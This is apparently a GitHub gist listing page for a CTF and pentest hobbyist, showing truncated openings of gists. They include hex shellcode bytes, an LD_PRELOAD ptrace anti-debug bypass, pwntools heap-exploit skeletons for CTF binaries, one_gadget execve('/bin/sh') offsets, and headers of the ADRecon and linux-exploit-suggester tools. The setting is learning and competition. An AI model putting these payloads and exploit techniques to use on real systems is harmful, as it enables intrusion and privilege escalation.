AJ N 0xPwny
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FC-E8-82-00-00-00 | |
| 60-89-E5-31-C0-64 | |
| 8B-50-30-8B-52-0C | |
| 8B-52-14-8B-72-28 | |
| 0F-B7-4A-26-31-FF | |
| AC-3C-61-7C-02-2C | |
| 20-C1-CF-0D-01-C7 | |
| E2-F2-52-57-8B-52 | |
| 10-8B-4A-3C-8B-4C | |
| 11-78-E3-48-01-D1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1: create and compile this code | |
| long ptrace(int request, int pid, void *addr, void *data) { | |
| return 0; | |
| } | |
| #gcc -shared ptrace.c -o ptrace.so | |
| 2: set this env variable in both shell and gdb : | |
| export LD_PRELOAD=./ptrace.so |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #IS THAT A REV CHALLENGE | |
| local20 = "deadbeef" | |
| local10 = 0x1505 | |
| counter = 0 | |
| while(counter < len(local20)): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment. | |
| .DESCRIPTION | |
| ADRecon is a tool which extracts and combines various artefacts (as highlighted below) out of an AD environment. The information can be presented in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis and provide a holistic picture of the current state of the target AD environment. | |
| The tool is useful to various classes of security professionals like auditors, DFIR, students, administrators, etc. It can also be an invaluable post-exploitation tool for a penetration tester. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| r = process("./defi3") | |
| def allocate(nom,idx): | |
| r.sendline("1") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Copyright (c) 2016-2018 | |
| # | |
| # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. | |
| # This is free software, and you are welcome to redistribute it | |
| # under the terms of the GNU General Public License. See LICENSE | |
| # file for usage of this software. | |
| # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = process("/root/pwnvm/challs/rootit/ch38") | |
| pause() | |
| def new(data): | |
| r.sendline("new {}".format(data)) | |
| r.recvuntil(">") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| #r = process("./army") | |
| HOST=sys.argv[1] | |
| PORT=sys.argv[2] | |
| r = remote(HOST,int(PORT)) | |
| libc = ELF("libc.so.6") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0x46428 execve("/bin/sh", rsp+0x30, environ) | |
| constraints: | |
| rax == NULL | |
| 0x4647c execve("/bin/sh", rsp+0x30, environ) | |
| constraints: | |
| [rsp+0x30] == NULL | |
| 0xe5765 execve("/bin/sh", rsp+0x50, environ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| ################################### | |
| # HITCON CTF - BFX HEAP - HOUSE OF FORCE | |
| ################################### | |
| r = remote(sys.argv[1],int(sys.argv[2])) | |
| pause() |
NewerOlder